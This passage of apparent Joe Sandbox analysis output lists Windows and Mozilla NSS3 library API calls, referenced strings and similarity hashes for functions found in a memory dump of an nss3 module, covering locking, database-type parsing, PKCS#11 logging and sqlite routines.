                                                              • PR_DestroyCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,6D1E1193), ref: 6D1E1D6F
                                                              • PR_DestroyCondVar.NSS3(00000000,?,?,?,?,?,6D1E1193), ref: 6D1E1D7B
                                                              • PR_DestroyCondVar.NSS3(?,?,?,?,?,6D1E1193), ref: 6D1E1D87
                                                              • PR_DestroyCondVar.NSS3(00000000,?,?,?,6D1E1193), ref: 6D1E1D93
                                                              • PR_DestroyLock.NSS3(00000000,?,?,6D1E1193), ref: 6D1E1D9F
                                                              • free.MOZGLUE(00000000,?,6D1E1193), ref: 6D1E1DA8
                                                              Similarity
                                                              • API ID: Cond$DestroyError$calloc$CriticalLockSection$Valuefree$CountEnterInitializeLastLeaveSpinUnlock
                                                              • String ID:
                                                              APIs
                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,multiaccess:,0000000C,?,00000000,?,?,6D135EC0,00000000,?,?), ref: 6D135CBE
                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004,?,?,?), ref: 6D135CD7
                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6D135CF0
                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6D135D09
                                                              • PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE,?,00000000,?,?,6D135EC0,00000000,?,?), ref: 6D135D1F
                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000003,?), ref: 6D135D3C
                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000006,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D135D51
                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000003,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D135D66
                                                              • PORT_Strdup_Util.NSS3(?,?,?,?), ref: 6D135D80
                                                              Strings
                                                              Similarity
                                                              • API ID: strncmp$SecureStrdup_Util
                                                              • String ID: NSS_DEFAULT_DB_TYPE$dbm:$extern:$multiaccess:$sql:
                                                              • API String ID: 1171493939-3017051476
                                                              APIs
                                                              • SEC_ASN1DecodeItem_Util.NSS3(?,?,6D201DE0,?), ref: 6D136CFE
                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6D136D26
                                                              • PR_SetError.NSS3(FFFFE04F,00000000), ref: 6D136D70
                                                              • PORT_Alloc_Util.NSS3(00000480), ref: 6D136D82
                                                              • DER_GetInteger_Util.NSS3(?), ref: 6D136DA2
                                                              • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6D136DD8
                                                              • PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6D136E60
                                                              • PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6D136F19
                                                              • PK11_DigestBegin.NSS3(00000000), ref: 6D136F2D
                                                              • PK11_DigestOp.NSS3(?,?,00000000), ref: 6D136F7B
                                                              • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6D137011
                                                              • PK11_FreeSymKey.NSS3(00000000), ref: 6D137033
                                                              • free.MOZGLUE(?), ref: 6D13703F
                                                              • PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6D137060
                                                              • SECITEM_CompareItem_Util.NSS3(?,?), ref: 6D137087
                                                              • PR_SetError.NSS3(FFFFE062,00000000), ref: 6D1370AF
                                                              Similarity
                                                              • API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
                                                              • String ID:
                                                              • API String ID: 2108637330-0
                                                              APIs
                                                              • SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D14ADB1
                                                                • Part of subcall function 6D12BE30: SECOID_FindOID_Util.NSS3(6D0E311B,00000000,?,6D0E311B,?), ref: 6D12BE44
                                                              • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6D14ADF4
                                                              • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6D14AE08
                                                                • Part of subcall function 6D12B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6D2018D0,?), ref: 6D12B095
                                                              • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6D14AE25
                                                              • PL_FreeArenaPool.NSS3 ref: 6D14AE63
                                                              • PR_CallOnce.NSS3(6D232AA4,6D1312D0), ref: 6D14AE4D
                                                                • Part of subcall function 6D054C70: TlsGetValue.KERNEL32(?,?,?,6D053921,6D2314E4,6D19CC70), ref: 6D054C97
                                                                • Part of subcall function 6D054C70: EnterCriticalSection.KERNEL32(?,?,?,?,6D053921,6D2314E4,6D19CC70), ref: 6D054CB0
                                                                • Part of subcall function 6D054C70: PR_Unlock.NSS3(?,?,?,?,?,6D053921,6D2314E4,6D19CC70), ref: 6D054CC9
                                                              • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D14AE93
                                                              • PR_CallOnce.NSS3(6D232AA4,6D1312D0), ref: 6D14AECC
                                                              • PL_FreeArenaPool.NSS3 ref: 6D14AEDE
                                                              • PL_FinishArenaPool.NSS3 ref: 6D14AEE6
                                                              • PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D14AEF5
                                                              • PL_FinishArenaPool.NSS3 ref: 6D14AF16
                                                              Strings
                                                              Similarity
                                                              • API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
                                                              • String ID: security
                                                              • API String ID: 3441714441-3315324353
                                                              APIs
                                                              • TlsGetValue.KERNEL32(?,?), ref: 6D0E8E22
                                                              • EnterCriticalSection.KERNEL32(?), ref: 6D0E8E36
                                                              • memset.VCRUNTIME140(?,00000000,?), ref: 6D0E8E4F
                                                              • calloc.MOZGLUE(00000001,?,?,?), ref: 6D0E8E78
                                                              • memcpy.VCRUNTIME140(-00000008,?,?), ref: 6D0E8E9B
                                                              • memset.VCRUNTIME140(00000000,00000000,?), ref: 6D0E8EAC
                                                              • PL_ArenaAllocate.NSS3(?,?), ref: 6D0E8EDE
                                                              • memcpy.VCRUNTIME140(-00000008,?,?), ref: 6D0E8EF0
                                                              • memset.VCRUNTIME140(?,00000000,?), ref: 6D0E8F00
                                                              • free.MOZGLUE(?), ref: 6D0E8F0E
                                                              • memcpy.VCRUNTIME140(?,?,?), ref: 6D0E8F39
                                                              • memset.VCRUNTIME140(?,00000000,?), ref: 6D0E8F4A
                                                              • memset.VCRUNTIME140(?,00000000,?), ref: 6D0E8F5B
                                                              • PR_Unlock.NSS3(?), ref: 6D0E8F72
                                                              • PR_Unlock.NSS3(?), ref: 6D0E8F82
                                                              Similarity
                                                              • API ID: memset$memcpy$Unlock$AllocateArenaCriticalEnterSectionValuecallocfree
                                                              • String ID:
                                                              • API String ID: 1569127702-0
                                                              APIs
                                                              • memcpy.VCRUNTIME140(?,?,?), ref: 6D05DD56
                                                              • memcpy.VCRUNTIME140(0000FFFE,?,?), ref: 6D05DD7C
                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6D05DE67
                                                              • memcpy.VCRUNTIME140(0000FFFC,?,?), ref: 6D05DEC4
                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6D05DECD
                                                              Strings
                                                              Similarity
                                                              • API ID: memcpy$_byteswap_ulong
                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                              • API String ID: 2339628231-598938438
                                                              APIs
                                                              • PORT_Alloc_Util.NSS3(?), ref: 6D11EE0B
                                                                • Part of subcall function 6D130BE0: malloc.MOZGLUE(6D128D2D,?,00000000,?), ref: 6D130BF8
                                                                • Part of subcall function 6D130BE0: TlsGetValue.KERNEL32(6D128D2D,?,00000000,?), ref: 6D130C15
                                                              • PR_SetError.NSS3(FFFFE013,00000000), ref: 6D11EEE1
                                                                • Part of subcall function 6D111D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6D111D7E
                                                                • Part of subcall function 6D111D50: EnterCriticalSection.KERNEL32(?), ref: 6D111D8E
                                                                • Part of subcall function 6D111D50: PR_Unlock.NSS3(?), ref: 6D111DD3
                                                              • TlsGetValue.KERNEL32 ref: 6D11EE51
                                                              • EnterCriticalSection.KERNEL32(?), ref: 6D11EE65
                                                              • PR_Unlock.NSS3(?), ref: 6D11EEA2
                                                              • free.MOZGLUE(?), ref: 6D11EEBB
                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6D11EED0
                                                              • PR_Unlock.NSS3(?), ref: 6D11EF48
                                                              • free.MOZGLUE(?), ref: 6D11EF68
                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6D11EF7D
                                                              • PK11_DoesMechanism.NSS3(?,?), ref: 6D11EFA4
                                                              • free.MOZGLUE(?), ref: 6D11EFDA
                                                              • PR_SetError.NSS3(FFFFE040,00000000), ref: 6D11F055
                                                              • free.MOZGLUE(?), ref: 6D11F060
                                                              Similarity
                                                              • API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
                                                              • String ID:
                                                              • API String ID: 2524771861-0
                                                              APIs
                                                              • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?), ref: 6D125C9B
                                                              • PR_SetError.NSS3(FFFFE043,00000000,?,?,?,?,?), ref: 6D125CF4
                                                              • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?), ref: 6D125CFD
                                                              • PR_smprintf.NSS3(tokens=[0x%x=<%s>],00000004,00000000,?,?,?,?,?,?), ref: 6D125D42
                                                              • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?), ref: 6D125D4E
                                                              • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D125D78
                                                              • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6D125E18
                                                              • TlsGetValue.KERNEL32 ref: 6D125E5E
                                                              • EnterCriticalSection.KERNEL32(?), ref: 6D125E72
                                                              • PR_Unlock.NSS3(?), ref: 6D125E8B
                                                                • Part of subcall function 6D11F820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6D11F854
                                                                • Part of subcall function 6D11F820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6D11F868
                                                                • Part of subcall function 6D11F820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6D11F882
                                                                • Part of subcall function 6D11F820: free.MOZGLUE(04C483FF,?,?), ref: 6D11F889
                                                                • Part of subcall function 6D11F820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6D11F8A4
                                                                • Part of subcall function 6D11F820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6D11F8AB
                                                                • Part of subcall function 6D11F820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6D11F8C9
                                                                • Part of subcall function 6D11F820: free.MOZGLUE(280F10EC,?,?), ref: 6D11F8D0
                                                              Strings
                                                              Similarity
                                                              • API ID: free$CriticalSection$Delete$DestroyErrorModule$EnterR_smprintfUnlockValue
                                                              • String ID: d$tokens=[0x%x=<%s>]
                                                              • API String ID: 2028831712-1373489631
                                                              APIs
                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6D11781D,00000000,6D10BE2C,?,6D116B1D,?,?,?,?,00000000,00000000,6D11781D), ref: 6D116C40
                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6D11781D,?,6D10BE2C,?), ref: 6D116C58
                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6D11781D), ref: 6D116C6F
                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6D116C84
                                                              • PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6D116C96
                                                                • Part of subcall function 6D0C1240: TlsGetValue.KERNEL32(00000040,?,6D0C116C,NSPR_LOG_MODULES), ref: 6D0C1267
                                                                • Part of subcall function 6D0C1240: EnterCriticalSection.KERNEL32(?,?,?,6D0C116C,NSPR_LOG_MODULES), ref: 6D0C127C
                                                                • Part of subcall function 6D0C1240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6D0C116C,NSPR_LOG_MODULES), ref: 6D0C1291
                                                                • Part of subcall function 6D0C1240: PR_Unlock.NSS3(?,?,?,?,6D0C116C,NSPR_LOG_MODULES), ref: 6D0C12A0
                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6D116CAA
                                                              Strings
                                                              Similarity
                                                              • API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
                                                              • String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
                                                              APIs
                                                              Similarity
                                                              • API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
                                                              • String ID:
                                                              APIs
                                                              • PR_LogPrint.NSS3(C_MessageSignInit), ref: 6D10ADE6
                                                              • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6D10AE17
                                                              • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6D10AE29
                                                                • Part of subcall function 6D1ED930: PL_strncpyz.NSS3(?,?,?), ref: 6D1ED963
                                                              • PR_LogPrint.NSS3(?,00000000), ref: 6D10AE3F
                                                              • PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6D10AE78
                                                              • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6D10AE8A
                                                              • PR_LogPrint.NSS3(?,00000000), ref: 6D10AEA0
                                                              Strings
                                                              Similarity
                                                              • API ID: L_strncpyzPrint$L_strcatn
                                                              • String ID: hKey = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageSignInit
                                                              APIs
                                                              • sqlite3_value_text16.NSS3(?), ref: 6D1A4CAF
                                                              • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6D1A4CFD
                                                              • sqlite3_value_text16.NSS3(?), ref: 6D1A4D44
                                                              Strings
                                                              Similarity
                                                              • API ID: sqlite3_value_text16$sqlite3_log
                                                              • String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
                                                              APIs
                                                              • PR_LogPrint.NSS3(C_InitPIN), ref: 6D102DF6
                                                              • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6D102E24
                                                              • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6D102E33
                                                                • Part of subcall function 6D1ED930: PL_strncpyz.NSS3(?,?,?), ref: 6D1ED963
                                                              • PR_LogPrint.NSS3(?,00000000), ref: 6D102E49
                                                              • PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6D102E68
                                                              • PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6D102E81
                                                              Strings
                                                              Similarity
                                                              • API ID: Print$L_strncpyz$L_strcatn
                                                              • String ID: hSession = 0x%x$ pPin = 0x%p$ ulPinLen = %d$ (CK_INVALID_HANDLE)$C_InitPIN
                                                              APIs
                                                              • sqlite3_initialize.NSS3 ref: 6D1A2D9F
                                                                • Part of subcall function 6D05CA30: EnterCriticalSection.KERNEL32(?,?,?,6D0BF9C9,?,6D0BF4DA,6D0BF9C9,?,?,6D08369A), ref: 6D05CA7A
                                                                • Part of subcall function 6D05CA30: LeaveCriticalSection.KERNEL32(?), ref: 6D05CB26
                                                              • sqlite3_exec.NSS3(?,?,6D1A2F70,?,?), ref: 6D1A2DF9
                                                              • sqlite3_free.NSS3(00000000), ref: 6D1A2E2C
                                                              • sqlite3_free.NSS3(?), ref: 6D1A2E3A
                                                              • sqlite3_free.NSS3(?), ref: 6D1A2E52
                                                              • sqlite3_mprintf.NSS3(6D20AAF9,?), ref: 6D1A2E62
                                                              • sqlite3_free.NSS3(?), ref: 6D1A2E70
                                                              • sqlite3_free.NSS3(?), ref: 6D1A2E89
                                                              • sqlite3_free.NSS3(?), ref: 6D1A2EBB
                                                              • sqlite3_free.NSS3(?), ref: 6D1A2ECB
                                                              • sqlite3_free.NSS3(00000000), ref: 6D1A2F3E
                                                              • sqlite3_free.NSS3(?), ref: 6D1A2F4C
                                                              Similarity
                                                              • API ID: sqlite3_free$CriticalSection$EnterLeavesqlite3_execsqlite3_initializesqlite3_mprintf
                                                              • String ID:
                                                              APIs
                                                              • TlsGetValue.KERNEL32(6D0F3F23,?,6D0EE477,?,?,?,00000001,00000000,?,?,6D0F3F23,?), ref: 6D0F2C62
                                                              • EnterCriticalSection.KERNEL32(0000001C,?,6D0EE477,?,?,?,00000001,00000000,?,?,6D0F3F23,?), ref: 6D0F2C76
                                                              • PL_HashTableLookup.NSS3(00000000,?,?,6D0EE477,?,?,?,00000001,00000000,?,?,6D0F3F23,?), ref: 6D0F2C86
                                                              • PR_Unlock.NSS3(00000000,?,?,?,?,6D0EE477,?,?,?,00000001,00000000,?,?,6D0F3F23,?), ref: 6D0F2C93
                                                                • Part of subcall function 6D17DD70: TlsGetValue.KERNEL32 ref: 6D17DD8C
                                                                • Part of subcall function 6D17DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6D17DDB4
                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,6D0EE477,?,?,?,00000001,00000000,?,?,6D0F3F23,?), ref: 6D0F2CC6
                                                              • EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6D0EE477,?,?,?,00000001,00000000,?,?,6D0F3F23,?), ref: 6D0F2CDA
                                                              • PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6D0EE477,?,?,?,00000001,00000000,?,?,6D0F3F23), ref: 6D0F2CEA
                                                              • PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6D0EE477,?,?,?,00000001,00000000,?), ref: 6D0F2CF7
                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6D0EE477,?,?,?,00000001,00000000,?), ref: 6D0F2D4D
                                                              • EnterCriticalSection.KERNEL32(?), ref: 6D0F2D61
                                                              • PL_HashTableLookup.NSS3(?,?), ref: 6D0F2D71
                                                              • PR_Unlock.NSS3(?), ref: 6D0F2D7E
                                                                • Part of subcall function 6D0C07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6D05204A), ref: 6D0C07AD
                                                                • Part of subcall function 6D0C07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6D05204A), ref: 6D0C07CD
                                                                • Part of subcall function 6D0C07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6D05204A), ref: 6D0C07D6
                                                                • Part of subcall function 6D0C07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6D05204A), ref: 6D0C07E4
                                                                • Part of subcall function 6D0C07A0: TlsSetValue.KERNEL32(00000000,?,6D05204A), ref: 6D0C0864
                                                                • Part of subcall function 6D0C07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6D0C0880
                                                                • Part of subcall function 6D0C07A0: TlsSetValue.KERNEL32(00000000,?,?,6D05204A), ref: 6D0C08CB
                                                                • Part of subcall function 6D0C07A0: TlsGetValue.KERNEL32(?,?,6D05204A), ref: 6D0C08D7
                                                                • Part of subcall function 6D0C07A0: TlsGetValue.KERNEL32(?,?,6D05204A), ref: 6D0C08FB
                                                              Similarity
                                                              • API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
                                                              • String ID:
                                                              APIs
                                                              • PR_CallOnce.NSS3(6D232120,6D0E7E60,?,?,?,?,?,6D1651DF,6D165990,00000000), ref: 6D0E7C81
                                                                • Part of subcall function 6D054C70: TlsGetValue.KERNEL32(?,?,?,6D053921,6D2314E4,6D19CC70), ref: 6D054C97
                                                                • Part of subcall function 6D054C70: EnterCriticalSection.KERNEL32(?,?,?,?,6D053921,6D2314E4,6D19CC70), ref: 6D054CB0
                                                                • Part of subcall function 6D054C70: PR_Unlock.NSS3(?,?,?,?,?,6D053921,6D2314E4,6D19CC70), ref: 6D054CC9
                                                              • TlsGetValue.KERNEL32 ref: 6D0E7CA0
                                                              • EnterCriticalSection.KERNEL32(?), ref: 6D0E7CB4
                                                              • PR_Unlock.NSS3 ref: 6D0E7CCF
                                                                • Part of subcall function 6D17DD70: TlsGetValue.KERNEL32 ref: 6D17DD8C
                                                                • Part of subcall function 6D17DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6D17DDB4
                                                              • TlsGetValue.KERNEL32 ref: 6D0E7D04
                                                              • EnterCriticalSection.KERNEL32(?), ref: 6D0E7D1B
                                                              • realloc.MOZGLUE(-00000050), ref: 6D0E7D82
                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6D0E7DF4
                                                              • PR_Unlock.NSS3 ref: 6D0E7E0E
                                                              Similarity
                                                              • API ID: CriticalSectionValue$EnterUnlock$CallErrorLeaveOncerealloc
                                                              • String ID:
                                                              APIs
                                                              • TlsGetValue.KERNEL32(?,?,?,6D053921,6D2314E4,6D19CC70), ref: 6D054C97
                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,6D053921,6D2314E4,6D19CC70), ref: 6D054CB0
                                                              • PR_Unlock.NSS3(?,?,?,?,?,6D053921,6D2314E4,6D19CC70), ref: 6D054CC9
                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,6D053921,6D2314E4,6D19CC70), ref: 6D054D11
                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6D053921,6D2314E4,6D19CC70), ref: 6D054D2A
                                                              • PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6D053921,6D2314E4,6D19CC70), ref: 6D054D4A
                                                              • PR_Unlock.NSS3(?,?,?,?,?,?,?,6D053921,6D2314E4,6D19CC70), ref: 6D054D57
                                                              • PR_GetCurrentThread.NSS3(?,?,?,?,?,6D053921,6D2314E4,6D19CC70), ref: 6D054D97
                                                              • PR_Lock.NSS3(?,?,?,?,?,6D053921,6D2314E4,6D19CC70), ref: 6D054DBA
                                                              • PR_WaitCondVar.NSS3 ref: 6D054DD4
                                                              • PR_Unlock.NSS3(?,?,?,?,?,6D053921,6D2314E4,6D19CC70), ref: 6D054DE6
                                                              • PR_GetCurrentThread.NSS3(?,?,?,?,?,6D053921,6D2314E4,6D19CC70), ref: 6D054DEF
                                                              Similarity
                                                              • API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
                                                              • String ID:
                                                              • API String ID: 3388019835-0
                                                              • Opcode ID: 869328e194fba13bdbb8ef374f05d162f6f43ad033f0335ebd4aec113cf5f02c
                                                              • Instruction ID: 7618ddbdbbaf229226e9a394c1f09da72f26acb091e3d3980eab4be5ea58e232
                                                              • Opcode Fuzzy Hash: 869328e194fba13bdbb8ef374f05d162f6f43ad033f0335ebd4aec113cf5f02c
                                                              • Instruction Fuzzy Hash: 0541ACB4908605DFDB11AFB9D58876ABBF0BF49318F068629DC489B310E730D8A0CF91
                                                              APIs
                                                              • PR_GetCurrentThread.NSS3 ref: 6D1E7CE0
                                                                • Part of subcall function 6D199BF0: TlsGetValue.KERNEL32(?,?,?,6D1E0A75), ref: 6D199C07
                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6D1E7D36
                                                              • PR_Realloc.NSS3(?,00000080), ref: 6D1E7D6D
                                                              • PR_GetCurrentThread.NSS3 ref: 6D1E7D8B
                                                              • PR_snprintf.NSS3(?,?,NSPR_INHERIT_FDS=%s:%d:0x%lx,?,?,?), ref: 6D1E7DC2
                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6D1E7DD8
                                                              • malloc.MOZGLUE(00000080), ref: 6D1E7DF8
                                                              • PR_GetCurrentThread.NSS3 ref: 6D1E7E06
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: CurrentThread$strlen$R_snprintfReallocValuemalloc
                                                              • String ID: :%s:%d:0x%lx$NSPR_INHERIT_FDS=%s:%d:0x%lx
                                                              • API String ID: 530461531-3274975309
                                                              • Opcode ID: f5d705172bc73581374ab4034f2591ffa9b606d00c39cd27bab74eef6925d550
                                                              • Instruction ID: 9cb2ebe2756db56198cd00810cb928c66695e8ea278355109c6c18d9ce7ec3c2
                                                              • Opcode Fuzzy Hash: f5d705172bc73581374ab4034f2591ffa9b606d00c39cd27bab74eef6925d550
                                                              • Instruction Fuzzy Hash: 6241E5B1D046029FEB08CF28DC8097B37BAFF84354B158569F9198B256D7B1E840C7A1
                                                              APIs
                                                              • PR_LogPrint.NSS3(C_InitToken), ref: 6D102CEC
                                                              • PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6D102D07
                                                                • Part of subcall function 6D1E09D0: PR_Now.NSS3 ref: 6D1E0A22
                                                                • Part of subcall function 6D1E09D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6D1E0A35
                                                                • Part of subcall function 6D1E09D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6D1E0A66
                                                                • Part of subcall function 6D1E09D0: PR_GetCurrentThread.NSS3 ref: 6D1E0A70
                                                                • Part of subcall function 6D1E09D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6D1E0A9D
                                                                • Part of subcall function 6D1E09D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6D1E0AC8
                                                                • Part of subcall function 6D1E09D0: PR_vsmprintf.NSS3(?,?), ref: 6D1E0AE8
                                                                • Part of subcall function 6D1E09D0: EnterCriticalSection.KERNEL32(?), ref: 6D1E0B19
                                                                • Part of subcall function 6D1E09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6D1E0B48
                                                                • Part of subcall function 6D1E09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6D1E0C76
                                                                • Part of subcall function 6D1E09D0: PR_LogFlush.NSS3 ref: 6D1E0C7E
                                                              • PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6D102D22
                                                                • Part of subcall function 6D1E09D0: OutputDebugStringA.KERNEL32(?), ref: 6D1E0B88
                                                                • Part of subcall function 6D1E09D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6D1E0C5D
                                                                • Part of subcall function 6D1E09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6D1E0C8D
                                                                • Part of subcall function 6D1E09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6D1E0C9C
                                                                • Part of subcall function 6D1E09D0: OutputDebugStringA.KERNEL32(?), ref: 6D1E0CD1
                                                                • Part of subcall function 6D1E09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6D1E0CEC
                                                                • Part of subcall function 6D1E09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6D1E0CFB
                                                                • Part of subcall function 6D1E09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6D1E0D16
                                                                • Part of subcall function 6D1E09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6D1E0D26
                                                                • Part of subcall function 6D1E09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6D1E0D35
                                                                • Part of subcall function 6D1E09D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6D1E0D65
                                                                • Part of subcall function 6D1E09D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6D1E0D70
                                                                • Part of subcall function 6D1E09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6D1E0D90
                                                                • Part of subcall function 6D1E09D0: free.MOZGLUE(00000000), ref: 6D1E0D99
                                                              • PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6D102D3B
                                                                • Part of subcall function 6D1E09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6D1E0BAB
                                                                • Part of subcall function 6D1E09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6D1E0BBA
                                                                • Part of subcall function 6D1E09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6D1E0D7E
                                                              • PR_LogPrint.NSS3( pLabel = 0x%p,?), ref: 6D102D54
